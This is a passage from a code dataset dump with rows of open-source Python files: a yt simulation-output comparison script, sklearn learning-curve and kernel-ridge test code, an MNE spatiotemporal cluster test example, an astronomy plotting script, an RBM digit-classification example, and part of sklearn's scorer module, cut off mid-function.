repo_name stringlengths 6 67 | path stringlengths 5 185 | copies stringlengths 1 3 | size stringlengths 4 6 | content stringlengths 1.02k 962k | license stringclasses 15 values |
|---|---|---|---|---|---|
mogrodnik/piernik | problems/mcrtest/piernik_problem.py | 5 | 1868 | #!/usr/bin/env python
import sys

import numpy as np
import matplotlib
# Select the non-interactive 'cairo' backend BEFORE pylab/pyplot is imported:
# matplotlib.use() has no effect once a backend has already been loaded,
# so calling it after `from pylab import *` (as before) was a no-op.
matplotlib.use('cairo')
from yt.mods import load as yt_load
from pylab import *  # noqa: F401,F403 -- provides figure/imshow/savefig/...

# Relative tolerance below which two field values are considered identical.
THRESHOLD = 1e-9
# Default field of interest (cosmic-ray component 1).
FIELD = "cr1"
def plot_diff(pf1, pf2, data1, data2, field):
    """Plot the relative difference of *field* between two simulation outputs.

    Writes two images to the working directory: 'diff.png' (map of the
    relative difference) and 'field.png' (the field from the second output).

    pf1, pf2 : yt parameter-file (static output) objects -- old and new runs.
    data1, data2 : slice data objects taken from pf1 / pf2 respectively.
    field : name of the field to compare.
    """
    wd = pf1.domain_width
    n_d = pf1.domain_dimensions
    # Image extent taken from dimensions 1 and 2 of the domain,
    # converted to parsecs via the dataset's unit conversion.
    ext = np.array([pf1.domain_left_edge[1], pf1.domain_right_edge[1],
                    pf1.domain_left_edge[2], pf1.domain_right_edge[2]])
    ext *= pf1['pc']
    # Fixed-resolution buffers oversampled 10x relative to the grid.
    img1 = data1.to_frb(wd[0], (n_d[1] * 10, n_d[0] * 10),
                        center=np.array([0, 0, 0]), height=wd[1])
    img2 = data2.to_frb(wd[0], (n_d[1] * 10, n_d[0] * 10),
                        center=np.array([0, 0, 0]), height=wd[1])
    # Relative difference; THRESHOLD in the denominator guards against
    # division by zero where the old field vanishes.
    diff = (img2[field] - img1[field]) / (img1[field] + THRESHOLD)
    # Symmetric color range centred on zero so red/blue are comparable.
    v = abs(diff).max()
    F = figure(1, (8, 6))
    imshow(diff, vmin=-v, vmax=v, extent=ext, cmap='RdBu')
    bar = colorbar()
    bar.ax.set_xlabel(r"$\frac{\rm{%s}^{\rm{new}} - \rm{%s}^{\rm{old}}}{\rm{%s}^{\rm{old}}}$"
                      % (field, field, field))
    draw()
    xlabel('x [pc]')
    ylabel('y [pc]')
    savefig('diff.png')
    # NOTE(review): reuses figure number 1 with a different size; matplotlib
    # ignores the size argument for an existing figure -- confirm intended.
    F = figure(1, (6, 6))
    clf()
    imshow(img2[field], extent=ext, cmap='algae')
    xlabel('x [pc]')
    ylabel('y [pc]')
    savefig('field.png')
# --- Command-line driver: compare two outputs field by field ---------------
# Usage: piernik_problem.py <old_output> <new_output>
if len(sys.argv) != 3:
    print("Wrong number of arguments!")
    sys.exit(-1)

PF1 = yt_load(sys.argv[1])
PF2 = yt_load(sys.argv[2])
# Slices through the z = 0 plane (axis 2) for the default field.
DATA1 = PF1.h.slice(2, 0.0, fields=[FIELD])
DATA2 = PF2.h.slice(2, 0.0, fields=[FIELD])

if not PF1.h.field_list == PF2.h.field_list:
    print("Fields in files differ!")
    sys.exit(-1)

for field in PF1.h.field_list:
    if abs(DATA1[field] - DATA2[field]).max() >= THRESHOLD:
        # Report and plot only the first differing field, then exit
        # with a failure code so the test harness notices.
        print("Field %s differs" % field)
        plot_diff(PF1, PF2, DATA1, DATA2, field)
        sys.exit(-1)

# No differences found: still emit the output images (nothing was plotted
# in this branch, so they come out empty) so downstream tooling always
# finds the files.
figure(1, (8, 6))
draw()
savefig('diff.png')
savefig('field.png')
| gpl-3.0 |
wavelets/scipy_2015_sklearn_tutorial | notebooks/solutions/06B_learning_curves.py | 21 | 1448 | from sklearn.metrics import explained_variance_score, mean_squared_error
from sklearn.cross_validation import train_test_split
def plot_learning_curve(model, err_func=explained_variance_score, N=300,
                        n_runs=10, n_sizes=50, ylim=None):
    """Plot training / validation error versus training-set size.

    Relies on module-level ``X``, ``y`` (the dataset) and ``np`` / ``plt``
    being in scope, as in the notebook this solution belongs to.

    model : estimator implementing fit/predict.
    err_func : metric called as ``err_func(y_true, y_pred)``.
    N : largest training-set size evaluated.
    n_runs : number of random train/test splits averaged per size.
    n_sizes : number of training-set sizes sampled between 5 and N.
    ylim : optional (ymin, ymax) limits for the plot.
    """
    sizes = np.linspace(5, N, n_sizes).astype(int)
    train_err = np.zeros((n_runs, n_sizes))
    validation_err = np.zeros((n_runs, n_sizes))
    for i in range(n_runs):
        for j, size in enumerate(sizes):
            xtrain, xtest, ytrain, ytest = train_test_split(
                X, y, train_size=size, random_state=i)
            # Train on only the first `size` points
            model.fit(xtrain, ytrain)
            validation_err[i, j] = err_func(ytest, model.predict(xtest))
            train_err[i, j] = err_func(ytrain, model.predict(xtrain))
    plt.plot(sizes, validation_err.mean(axis=0), lw=2, label='validation')
    plt.plot(sizes, train_err.mean(axis=0), lw=2, label='training')
    # Fix: label previously read 'traning set size'.
    plt.xlabel('training set size')
    plt.ylabel(err_func.__name__.replace('_', ' '))
    plt.grid(True)
    plt.legend(loc=0)
    plt.xlim(0, N-1)
    if ylim:
        plt.ylim(ylim)
# Compare Lasso and Ridge learning curves in a 2x2 grid: top row shows
# explained variance, bottom row shows mean squared error for each model.
plt.figure(figsize=(10, 8))
for i, model in enumerate([Lasso(0.01), Ridge(0.06)]):
    plt.subplot(221 + i)
    plot_learning_curve(model, ylim=(0, 1))
    plt.title(model.__class__.__name__)
    plt.subplot(223 + i)
    plot_learning_curve(model, err_func=mean_squared_error, ylim=(0, 8000))
| cc0-1.0 |
jereze/scikit-learn | sklearn/tests/test_kernel_ridge.py | 342 | 3027 | import numpy as np
import scipy.sparse as sp
from sklearn.datasets import make_regression
from sklearn.linear_model import Ridge
from sklearn.kernel_ridge import KernelRidge
from sklearn.metrics.pairwise import pairwise_kernels
from sklearn.utils.testing import ignore_warnings
from sklearn.utils.testing import assert_array_almost_equal
# Shared regression fixture: dense X, sparse CSR/CSC copies, and a
# duplicated two-column target for the multi-output test.
X, y = make_regression(n_features=10)
Xcsr = sp.csr_matrix(X)
Xcsc = sp.csc_matrix(X)
Y = np.array([y, y]).T
def test_kernel_ridge():
    # A linear-kernel KernelRidge must match a no-intercept Ridge.
    ridge_pred = Ridge(alpha=1, fit_intercept=False).fit(X, y).predict(X)
    kr_pred = KernelRidge(kernel="linear", alpha=1).fit(X, y).predict(X)
    assert_array_almost_equal(ridge_pred, kr_pred)
def test_kernel_ridge_csr():
    # Same Ridge/KernelRidge equivalence as the dense case, on CSR input.
    baseline = Ridge(alpha=1, fit_intercept=False,
                     solver="cholesky").fit(Xcsr, y).predict(Xcsr)
    kr_out = KernelRidge(kernel="linear", alpha=1).fit(Xcsr, y).predict(Xcsr)
    assert_array_almost_equal(baseline, kr_out)
def test_kernel_ridge_csc():
    # Same Ridge/KernelRidge equivalence as the dense case, on CSC input.
    baseline = Ridge(alpha=1, fit_intercept=False,
                     solver="cholesky").fit(Xcsc, y).predict(Xcsc)
    kr_out = KernelRidge(kernel="linear", alpha=1).fit(Xcsc, y).predict(Xcsc)
    assert_array_almost_equal(baseline, kr_out)
def test_kernel_ridge_singular_kernel():
    # alpha=0 causes a LinAlgError in computing the dual coefficients,
    # which causes a fallback to a lstsq solver. This is tested here.
    ridge_out = Ridge(alpha=0, fit_intercept=False).fit(X, y).predict(X)
    kr = KernelRidge(kernel="linear", alpha=0)
    ignore_warnings(kr.fit)(X, y)
    kr_out = kr.predict(X)
    assert_array_almost_equal(ridge_out, kr_out)
def test_kernel_ridge_precomputed():
    # Fitting on a precomputed Gram matrix must match fitting on raw X
    # for every built-in kernel tested here.
    for kernel_name in ("linear", "rbf", "poly", "cosine"):
        gram = pairwise_kernels(X, X, metric=kernel_name)
        direct = KernelRidge(kernel=kernel_name).fit(X, y).predict(X)
        via_gram = KernelRidge(kernel="precomputed").fit(gram, y).predict(gram)
        assert_array_almost_equal(direct, via_gram)
def test_kernel_ridge_precomputed_kernel_unchanged():
    # fit() must not modify a user-supplied precomputed kernel in place.
    gram = np.dot(X, X.T)
    gram_before = gram.copy()
    KernelRidge(kernel="precomputed").fit(gram, y)
    assert_array_almost_equal(gram, gram_before)
def test_kernel_ridge_sample_weights():
    # Sample weights must be honoured identically by Ridge and by
    # KernelRidge with either a linear or a precomputed kernel.
    gram = np.dot(X, X.T)  # precomputed kernel
    weights = np.random.RandomState(0).rand(X.shape[0])
    ridge_out = Ridge(alpha=1, fit_intercept=False).fit(
        X, y, sample_weight=weights).predict(X)
    kr_linear = KernelRidge(kernel="linear", alpha=1).fit(
        X, y, sample_weight=weights).predict(X)
    kr_gram = KernelRidge(kernel="precomputed", alpha=1).fit(
        gram, y, sample_weight=weights).predict(gram)
    assert_array_almost_equal(ridge_out, kr_linear)
    assert_array_almost_equal(ridge_out, kr_gram)
def test_kernel_ridge_multi_output():
    # Multi-output KernelRidge must match multi-output Ridge, ...
    ridge_out = Ridge(alpha=1, fit_intercept=False).fit(X, Y).predict(X)
    kr_multi = KernelRidge(kernel="linear", alpha=1).fit(X, Y).predict(X)
    assert_array_almost_equal(ridge_out, kr_multi)
    # ... and, for duplicated targets, equal the single-output
    # prediction stacked column-wise.
    kr_single = KernelRidge(kernel="linear", alpha=1).fit(X, y).predict(X)
    stacked = np.array([kr_single, kr_single]).T
    assert_array_almost_equal(kr_multi, stacked)
| bsd-3-clause |
mne-tools/mne-tools.github.io | 0.12/_downloads/plot_spatio_temporal_cluster_stats_sensor.py | 7 | 7157 | """
.. _stats_cluster_sensors_2samp_spatial:
=====================================================
Spatiotemporal permutation F-test on full sensor data
=====================================================
Tests for differential evoked responses in at least
one condition using a permutation clustering test.
The FieldTrip neighbor templates will be used to determine
the adjacency between sensors. This serves as a spatial prior
to the clustering. Significant spatiotemporal clusters will then
be visualized using custom matplotlib code.
"""
# Authors: Denis Engemann <denis.engemann@gmail.com>
#
# License: BSD (3-clause)
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
from mne.viz import plot_topomap
import mne
from mne.stats import spatio_temporal_cluster_test
from mne.datasets import sample
from mne.channels import read_ch_connectivity
print(__doc__)
###############################################################################
# Set parameters
# Set parameters
data_path = sample.data_path()
raw_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw.fif'
event_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw-eve.fif'
event_id = {'Aud_L': 1, 'Aud_R': 2, 'Vis_L': 3, 'Vis_R': 4}
tmin = -0.2  # epoch start relative to stimulus, in seconds
tmax = 0.5   # epoch end relative to stimulus, in seconds

# Setup for reading the raw data
raw = mne.io.Raw(raw_fname, preload=True)
raw.filter(1, 30)  # band-pass 1-30 Hz
events = mne.read_events(event_fname)

# Read epochs for the channel of interest
picks = mne.pick_types(raw.info, meg='mag', eog=True)
reject = dict(mag=4e-12, eog=150e-6)  # amplitude rejection thresholds
epochs = mne.Epochs(raw, events, event_id, tmin, tmax, picks=picks,
                    baseline=None, reject=reject, preload=True)
epochs.drop_channels(['EOG 061'])
# Equalize trial counts across conditions so the F-test is balanced.
epochs.equalize_event_counts(event_id, copy=False)

condition_names = 'Aud_L', 'Aud_R', 'Vis_L', 'Vis_R'
X = [epochs[k].get_data() for k in condition_names]  # as 3D matrix
X = [np.transpose(x, (0, 2, 1)) for x in X]  # transpose for clustering

# load FieldTrip neighbor definition to setup sensor connectivity
connectivity, ch_names = read_ch_connectivity('neuromag306mag')

print(type(connectivity))  # it's a sparse matrix!

plt.imshow(connectivity.toarray(), cmap='gray', origin='lower',
           interpolation='nearest')
plt.xlabel('{} Magnetometers'.format(len(ch_names)))
plt.ylabel('{} Magnetometers'.format(len(ch_names)))
plt.title('Between-sensor adjacency')
###############################################################################
# Compute permutation statistic
#
# How does it work? We use clustering to `bind` together features which are
# similar. Our features are the magnetic fields measured over our sensor
# array at different times. This reduces the multiple comparison problem.
# To compute the actual test-statistic, we first sum all F-values in all
# clusters. We end up with one statistic for each cluster.
# Then we generate a distribution from the data by shuffling our conditions
# between our samples and recomputing our clusters and the test statistics.
# We test for the significance of a given cluster by computing the probability
# of observing a cluster of that size. For more background read:
# Maris/Oostenveld (2007), "Nonparametric statistical testing of EEG- and
# MEG-data" Journal of Neuroscience Methods, Vol. 164, No. 1., pp. 177-190.
# doi:10.1016/j.jneumeth.2007.03.024
# set cluster threshold
threshold = 50.0  # very high, but the test is quite sensitive on this data
# set family-wise p-value
p_accept = 0.001

cluster_stats = spatio_temporal_cluster_test(X, n_permutations=1000,
                                             threshold=threshold, tail=1,
                                             n_jobs=2,
                                             connectivity=connectivity)

# T_obs: F-statistics per (time, sensor); clusters: index tuples;
# p_values: one permutation p-value per cluster.
T_obs, clusters, p_values, _ = cluster_stats
good_cluster_inds = np.where(p_values < p_accept)[0]

# Note. The same function works with source estimates. The only differences
# are the origin of the data, the size, and the connectivity definition.
# It can be used for single trials or for groups of subjects.
###############################################################################
# Visualize clusters
# configure variables for visualization
# configure variables for visualization
times = epochs.times * 1e3  # epoch times in milliseconds
colors = 'r', 'r', 'steelblue', 'steelblue'
linestyles = '-', '--', '-', '--'

# grand average as numpy array (conditions x times x sensors)
grand_ave = np.array(X).mean(axis=1)

# get sensor positions via layout
pos = mne.find_layout(epochs.info).pos

# loop over significant clusters
for i_clu, clu_idx in enumerate(good_cluster_inds):
    # unpack cluster information, get unique indices
    time_inds, space_inds = np.squeeze(clusters[clu_idx])
    ch_inds = np.unique(space_inds)
    time_inds = np.unique(time_inds)

    # get topography for F stat, averaged over the cluster's time span
    f_map = T_obs[time_inds, ...].mean(axis=0)

    # get signals at significant sensors
    signals = grand_ave[..., ch_inds].mean(axis=-1)
    sig_times = times[time_inds]

    # create spatial mask marking the cluster's sensors
    mask = np.zeros((f_map.shape[0], 1), dtype=bool)
    mask[ch_inds, :] = True

    # initialize figure
    fig, ax_topo = plt.subplots(1, 1, figsize=(10, 3))
    title = 'Cluster #{0}'.format(i_clu + 1)
    fig.suptitle(title, fontsize=14)

    # plot average test statistic and mark significant sensors
    image, _ = plot_topomap(f_map, pos, mask=mask, axis=ax_topo,
                            cmap='Reds', vmin=np.min, vmax=np.max)

    # advanced matplotlib for showing image with figure and colorbar
    # in one plot
    divider = make_axes_locatable(ax_topo)

    # add axes for colorbar
    ax_colorbar = divider.append_axes('right', size='5%', pad=0.05)
    plt.colorbar(image, cax=ax_colorbar)
    ax_topo.set_xlabel('Averaged F-map ({:0.1f} - {:0.1f} ms)'.format(
        *sig_times[[0, -1]]
    ))

    # add new axis for time courses and plot time courses
    ax_signals = divider.append_axes('right', size='300%', pad=1.2)
    for signal, name, col, ls in zip(signals, condition_names, colors,
                                     linestyles):
        ax_signals.plot(times, signal, color=col, linestyle=ls, label=name)

    # add information
    ax_signals.axvline(0, color='k', linestyle=':', label='stimulus onset')
    ax_signals.set_xlim([times[0], times[-1]])
    ax_signals.set_xlabel('time [ms]')
    ax_signals.set_ylabel('evoked magnetic fields [fT]')

    # plot significant time range as a shaded band
    ymin, ymax = ax_signals.get_ylim()
    ax_signals.fill_betweenx((ymin, ymax), sig_times[0], sig_times[-1],
                             color='orange', alpha=0.3)
    ax_signals.legend(loc='lower right')
    ax_signals.set_ylim(ymin, ymax)

    # clean up viz
    mne.viz.tight_layout(fig=fig)
    fig.subplots_adjust(bottom=.05)
    plt.show()
"""
Exercises
----------
- What is the smallest p-value you can obtain, given the finite number of
permutations?
- use an F distribution to compute the threshold by traditional significance
levels. Hint: take a look at ```scipy.stats.distributions.f```
"""
| bsd-3-clause |
guangtunbenzhu/BGT-Cosmology | Spectroscopy/emissioninfill_movie.py | 1 | 1832 | import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
import speclines
import ebossspec, ebossanalysis
# Build movie frames showing the unified absorption trough being
# progressively filled in by the unified emission profile.
data = ebossanalysis.unify_emissionline_profile_readin()
absorption = ebossanalysis.unify_absorptionline_profile_readin()
vel = data['VEL']
# Deepen the absorption profile by 25% and clip negative fluxes to zero.
yabs = 1.-(1.-absorption['UNIFIEDABSORPTION'])*1.25
yabs[yabs<0.] = 0.
# Continuum-subtracted emission component.
yemi = data['UNIFIEDFLUX']-1.
CM = plt.get_cmap('jet_r')
fig, ax = plt.subplots(figsize=(11,5), ncols=1, nrows=1)
fig.subplots_adjust(hspace=0, top=0.90, bottom=0.15)
# One frame per emission-infill fraction, stepping from 0 up to 0.7.
nplot = 35
demi = 0.7/nplot
xlimits = [-700, 500]
for i in np.arange(nplot)*demi:
    thiscolor = CM(i/0.7+0.08/0.7)
    # Absorption plus a fraction i of the emission infill.
    flux = yabs+yemi*i
    # Renormalize by the summed depth over pixels 95..103
    # (presumably the line centre is at pixel 100 -- TODO confirm).
    flux_norm = np.sum(1.-flux[100-5:100+4])
    flux = 1.-(1.-flux)/flux_norm
    ax.plot(vel, flux, color=thiscolor, lw=3)#, drawstyle='steps')
    ax.set_xlim(-700, 500)
    ax.set_ylim(0.745, 1.03)
    ax.plot(xlimits, [1,1], ':', color='black', lw=2)
    ax.set_xlabel(r'Velocity [km$\,$s$^{-1}$]', fontsize=24)
    ax.set_ylabel(r'$\left<R(\lambda)\right>$', fontsize=24)
    ax.tick_params(axis='x', which='major', length=8, width=2, labelsize=22, pad=8)
    ax.tick_params(axis='y', which='major', length=8, width=2, labelsize=22, pad=8)
    ax.plot([0,0],[-0.01,1.05],':', color='black', lw=2)
    # Save one frame per infill fraction, then clear for the next frame.
    outfile = ('Figures/Movies/Emission_Infill_Movie_{0:4.2f}.jpg').format(i)
    fig.savefig(outfile)
    ax.cla()

#ax.plot(xtmp, ytmp, '--', lw=6, color='green')
#ax.text(-750, 1.3, 'Unified Absorption Profile (Flipped)', color='Red', fontsize=21)
#ax.text(-750, 1.26, 'Unified Emission Profile', color='Blue', fontsize=21)
#ax.text(-750, 1.22, r'Gaussian ($\sigma=108\,$km s$^{-1}$)', color='Green', fontsize=21)
#plt.setp(ax.get_xticklabels(), visible=False)
#fig.savefig('/Users/Benjamin/Dropbox/Zhu_Projects/Fine Structure Emission/Version 1/OIII_Emission_Gaussian.eps')
| mit |
liyu1990/sklearn | examples/neural_networks/plot_rbm_logistic_classification.py | 99 | 4608 | """
==============================================================
Restricted Boltzmann Machine features for digit classification
==============================================================
For greyscale image data where pixel values can be interpreted as degrees of
blackness on a white background, like handwritten digit recognition, the
Bernoulli Restricted Boltzmann machine model (:class:`BernoulliRBM
<sklearn.neural_network.BernoulliRBM>`) can perform effective non-linear
feature extraction.
In order to learn good latent representations from a small dataset, we
artificially generate more labeled data by perturbing the training data with
linear shifts of 1 pixel in each direction.
This example shows how to build a classification pipeline with a BernoulliRBM
feature extractor and a :class:`LogisticRegression
<sklearn.linear_model.LogisticRegression>` classifier. The hyperparameters
of the entire model (learning rate, hidden layer size, regularization)
were optimized by grid search, but the search is not reproduced here because
of runtime constraints.
Logistic regression on raw pixel values is presented for comparison. The
example shows that the features extracted by the BernoulliRBM help improve the
classification accuracy.
"""
from __future__ import print_function
print(__doc__)
# Authors: Yann N. Dauphin, Vlad Niculae, Gabriel Synnaeve
# License: BSD
import numpy as np
import matplotlib.pyplot as plt
from scipy.ndimage import convolve
from sklearn import linear_model, datasets, metrics
from sklearn.model_selection import train_test_split
from sklearn.neural_network import BernoulliRBM
from sklearn.pipeline import Pipeline
###############################################################################
# Setting up
def nudge_dataset(X, Y):
    """Augment a digit dataset with single-pixel translations.

    Produces a dataset 5 times bigger than the original one by moving
    the 8x8 images in X around by 1px to left, right, down, up.

    X : array of shape (n_samples, 64), flattened 8x8 images.
    Y : array of shape (n_samples,), labels (repeated for each shift).

    Returns the augmented (X, Y) pair of shapes (5*n, 64) and (5*n,).
    """
    # Each 3x3 kernel has a single 1 offset from the centre; convolving
    # with it translates the image by one pixel in that direction.
    direction_vectors = [
        [[0, 1, 0],
         [0, 0, 0],
         [0, 0, 0]],

        [[0, 0, 0],
         [1, 0, 0],
         [0, 0, 0]],

        [[0, 0, 0],
         [0, 0, 1],
         [0, 0, 0]],

        [[0, 0, 0],
         [0, 0, 0],
         [0, 1, 0]]]

    # PEP 8 (E731): use a def, not a lambda assignment.
    def shift(x, w):
        """Shift one flattened 8x8 image by the 3x3 kernel *w*."""
        return convolve(x.reshape((8, 8)), mode='constant',
                        weights=w).ravel()

    X = np.concatenate([X] +
                       [np.apply_along_axis(shift, 1, X, vector)
                        for vector in direction_vectors])
    Y = np.concatenate([Y for _ in range(5)], axis=0)
    return X, Y
# Load Data
digits = datasets.load_digits()
X = np.asarray(digits.data, 'float32')
X, Y = nudge_dataset(X, digits.target)
X = (X - np.min(X, 0)) / (np.max(X, 0) + 0.0001) # 0-1 scaling
X_train, X_test, Y_train, Y_test = train_test_split(X, Y,
test_size=0.2,
random_state=0)
# Models we will use
logistic = linear_model.LogisticRegression()
rbm = BernoulliRBM(random_state=0, verbose=True)
classifier = Pipeline(steps=[('rbm', rbm), ('logistic', logistic)])
###############################################################################
# Training
# Hyper-parameters. These were set by cross-validation,
# using a GridSearchCV. Here we are not performing cross-validation to
# save time.
rbm.learning_rate = 0.06
rbm.n_iter = 20
# More components tend to give better prediction performance, but larger
# fitting time
rbm.n_components = 100
logistic.C = 6000.0
# Training RBM-Logistic Pipeline
classifier.fit(X_train, Y_train)
# Training Logistic regression
logistic_classifier = linear_model.LogisticRegression(C=100.0)
logistic_classifier.fit(X_train, Y_train)
###############################################################################
# Evaluation
print()
print("Logistic regression using RBM features:\n%s\n" % (
metrics.classification_report(
Y_test,
classifier.predict(X_test))))
print("Logistic regression using raw pixel features:\n%s\n" % (
metrics.classification_report(
Y_test,
logistic_classifier.predict(X_test))))
###############################################################################
# Plotting
plt.figure(figsize=(4.2, 4))
for i, comp in enumerate(rbm.components_):
plt.subplot(10, 10, i + 1)
plt.imshow(comp.reshape((8, 8)), cmap=plt.cm.gray_r,
interpolation='nearest')
plt.xticks(())
plt.yticks(())
plt.suptitle('100 components extracted by RBM', fontsize=16)
plt.subplots_adjust(0.08, 0.02, 0.92, 0.85, 0.08, 0.23)
plt.show()
| bsd-3-clause |
mikebenfield/scikit-learn | sklearn/metrics/scorer.py | 33 | 17925 | """
The :mod:`sklearn.metrics.scorer` submodule implements a flexible
interface for model selection and evaluation using
arbitrary score functions.
A scorer object is a callable that can be passed to
:class:`sklearn.model_selection.GridSearchCV` or
:func:`sklearn.model_selection.cross_val_score` as the ``scoring``
parameter, to specify how a model should be evaluated.
The signature of the call is ``(estimator, X, y)`` where ``estimator``
is the model to be evaluated, ``X`` is the test data and ``y`` is the
ground truth labeling (or ``None`` in the case of unsupervised models).
"""
# Authors: Andreas Mueller <amueller@ais.uni-bonn.de>
# Lars Buitinck
# Arnaud Joly <arnaud.v.joly@gmail.com>
# License: Simplified BSD
from abc import ABCMeta, abstractmethod
import warnings
import numpy as np
from . import (r2_score, median_absolute_error, mean_absolute_error,
mean_squared_error, mean_squared_log_error, accuracy_score,
f1_score, roc_auc_score, average_precision_score,
precision_score, recall_score, log_loss)
from .cluster import adjusted_rand_score
from .cluster import homogeneity_score
from .cluster import completeness_score
from .cluster import v_measure_score
from .cluster import mutual_info_score
from .cluster import adjusted_mutual_info_score
from .cluster import normalized_mutual_info_score
from .cluster import fowlkes_mallows_score
from ..utils.multiclass import type_of_target
from ..externals import six
from ..base import is_regressor
class _BaseScorer(six.with_metaclass(ABCMeta, object)):
    """Abstract base for the scorer callables built by ``make_scorer``."""

    def __init__(self, score_func, sign, kwargs):
        # Extra keyword arguments forwarded to score_func on every call.
        self._kwargs = kwargs
        self._score_func = score_func
        # +1 for scores (greater is better), -1 for losses.
        self._sign = sign
        # XXX After removing the deprecated scorers (v0.20) remove the
        # XXX deprecation_msg property again and remove __call__'s body again
        self._deprecation_msg = None

    @abstractmethod
    def __call__(self, estimator, X, y, sample_weight=None):
        # Subclasses call super().__call__ first so deprecated scorer
        # aliases emit their DeprecationWarning on each use.
        if self._deprecation_msg is not None:
            warnings.warn(self._deprecation_msg,
                          category=DeprecationWarning,
                          stacklevel=2)

    def __repr__(self):
        kwargs_string = "".join([", %s=%s" % (str(k), str(v))
                                 for k, v in self._kwargs.items()])
        return ("make_scorer(%s%s%s%s)"
                % (self._score_func.__name__,
                   "" if self._sign > 0 else ", greater_is_better=False",
                   self._factory_args(), kwargs_string))

    def _factory_args(self):
        """Return non-default make_scorer arguments for repr."""
        return ""
class _PredictScorer(_BaseScorer):
    def __call__(self, estimator, X, y_true, sample_weight=None):
        """Score ``estimator.predict(X)`` against the ground truth.

        Parameters
        ----------
        estimator : object
            Trained estimator whose ``predict`` output is scored.

        X : array-like or sparse matrix
            Test data fed to ``estimator.predict``.

        y_true : array-like
            Ground-truth target values for X.

        sample_weight : array-like, optional (default=None)
            Per-sample weights forwarded to the score function.

        Returns
        -------
        score : float
            Signed score of the estimator's predictions on X.
        """
        super(_PredictScorer, self).__call__(estimator, X, y_true,
                                             sample_weight=sample_weight)
        predictions = estimator.predict(X)
        if sample_weight is None:
            return self._sign * self._score_func(y_true, predictions,
                                                 **self._kwargs)
        return self._sign * self._score_func(y_true, predictions,
                                             sample_weight=sample_weight,
                                             **self._kwargs)
class _ProbaScorer(_BaseScorer):
    def __call__(self, clf, X, y, sample_weight=None):
        """Score ``clf.predict_proba(X)`` against the ground truth.

        Parameters
        ----------
        clf : object
            Trained classifier; must provide ``predict_proba``, whose
            output is what gets scored.

        X : array-like or sparse matrix
            Test data fed to ``clf.predict_proba``.

        y : array-like
            Ground-truth class labels (not probabilities) for X.

        sample_weight : array-like, optional (default=None)
            Per-sample weights forwarded to the score function.

        Returns
        -------
        score : float
            Signed score of the classifier's probabilities on X.
        """
        super(_ProbaScorer, self).__call__(clf, X, y,
                                           sample_weight=sample_weight)
        proba = clf.predict_proba(X)
        if sample_weight is None:
            return self._sign * self._score_func(y, proba, **self._kwargs)
        return self._sign * self._score_func(y, proba,
                                             sample_weight=sample_weight,
                                             **self._kwargs)

    def _factory_args(self):
        return ", needs_proba=True"
class _ThresholdScorer(_BaseScorer):
    def __call__(self, clf, X, y, sample_weight=None):
        """Evaluate decision function output for X relative to y_true.

        Parameters
        ----------
        clf : object
            Trained classifier to use for scoring. Must have either a
            decision_function method or a predict_proba method; the output of
            that is used to compute the score.

        X : array-like or sparse matrix
            Test data that will be fed to clf.decision_function or
            clf.predict_proba.

        y : array-like
            Gold standard target values for X. These must be class labels,
            not decision function values.

        sample_weight : array-like, optional (default=None)
            Sample weights.

        Returns
        -------
        score : float
            Score function applied to prediction of estimator on X.
        """
        super(_ThresholdScorer, self).__call__(clf, X, y,
                                               sample_weight=sample_weight)
        y_type = type_of_target(y)
        if y_type not in ("binary", "multilabel-indicator"):
            raise ValueError("{0} format is not supported".format(y_type))

        if is_regressor(clf):
            y_pred = clf.predict(X)
        else:
            try:
                y_pred = clf.decision_function(X)

                # For multi-output multi-class estimator.
                # Fix: np.vstack on a bare generator is deprecated in NumPy
                # and an error in recent releases -- pass a list instead.
                if isinstance(y_pred, list):
                    y_pred = np.vstack([p for p in y_pred]).T

            except (NotImplementedError, AttributeError):
                y_pred = clf.predict_proba(X)

                if y_type == "binary":
                    # Keep only the probability of the positive class.
                    y_pred = y_pred[:, 1]
                elif isinstance(y_pred, list):
                    y_pred = np.vstack([p[:, -1] for p in y_pred]).T

        if sample_weight is not None:
            return self._sign * self._score_func(y, y_pred,
                                                 sample_weight=sample_weight,
                                                 **self._kwargs)
        else:
            return self._sign * self._score_func(y, y_pred, **self._kwargs)

    def _factory_args(self):
        return ", needs_threshold=True"
def get_scorer(scoring):
    """Resolve *scoring* (a string key or a scorer callable) to a scorer."""
    if not isinstance(scoring, six.string_types):
        # Already a scorer callable; pass it straight through.
        return scoring
    try:
        return SCORERS[scoring]
    except KeyError:
        # Offer only the non-deprecated names in the error message.
        valid_names = [scorer for scorer in SCORERS
                       if SCORERS[scorer]._deprecation_msg is None]
        raise ValueError('%r is not a valid scoring value. '
                         'Valid options are %s'
                         % (scoring, sorted(valid_names)))
def _passthrough_scorer(estimator, *args, **kwargs):
    """Scorer that simply defers to the estimator's own ``score`` method."""
    score_method = estimator.score
    return score_method(*args, **kwargs)
def check_scoring(estimator, scoring=None, allow_none=False):
    """Determine scorer from user options.

    A TypeError will be thrown if the estimator cannot be scored.

    Parameters
    ----------
    estimator : estimator object implementing 'fit'
        The object to use to fit the data.

    scoring : string, callable or None, optional, default: None
        A string (see model evaluation documentation) or
        a scorer callable object / function with signature
        ``scorer(estimator, X, y)``.

    allow_none : boolean, optional, default: False
        If no scoring is specified and the estimator has no score function, we
        can either return None or raise an exception.

    Returns
    -------
    scoring : callable
        A scorer callable object / function with signature
        ``scorer(estimator, X, y)``.
    """
    has_scoring = scoring is not None
    if not hasattr(estimator, 'fit'):
        raise TypeError("estimator should be an estimator implementing "
                        "'fit' method, %r was passed" % estimator)
    if isinstance(scoring, six.string_types):
        return get_scorer(scoring)
    elif has_scoring:
        # Heuristic to ensure user has not passed a metric
        # (metrics live in sklearn.metrics but are not scorers).
        module = getattr(scoring, '__module__', None)
        if hasattr(module, 'startswith') and \
           module.startswith('sklearn.metrics.') and \
           not module.startswith('sklearn.metrics.scorer') and \
           not module.startswith('sklearn.metrics.tests.'):
            raise ValueError('scoring value %r looks like it is a metric '
                             'function rather than a scorer. A scorer should '
                             'require an estimator as its first parameter. '
                             'Please use `make_scorer` to convert a metric '
                             'to a scorer.' % scoring)
        return get_scorer(scoring)
    elif hasattr(estimator, 'score'):
        # No scoring requested: fall back to the estimator's own score().
        return _passthrough_scorer
    elif allow_none:
        return None
    else:
        raise TypeError(
            "If no scoring is specified, the estimator passed should "
            "have a 'score' method. The estimator %r does not." % estimator)
def make_scorer(score_func, greater_is_better=True, needs_proba=False,
                needs_threshold=False, **kwargs):
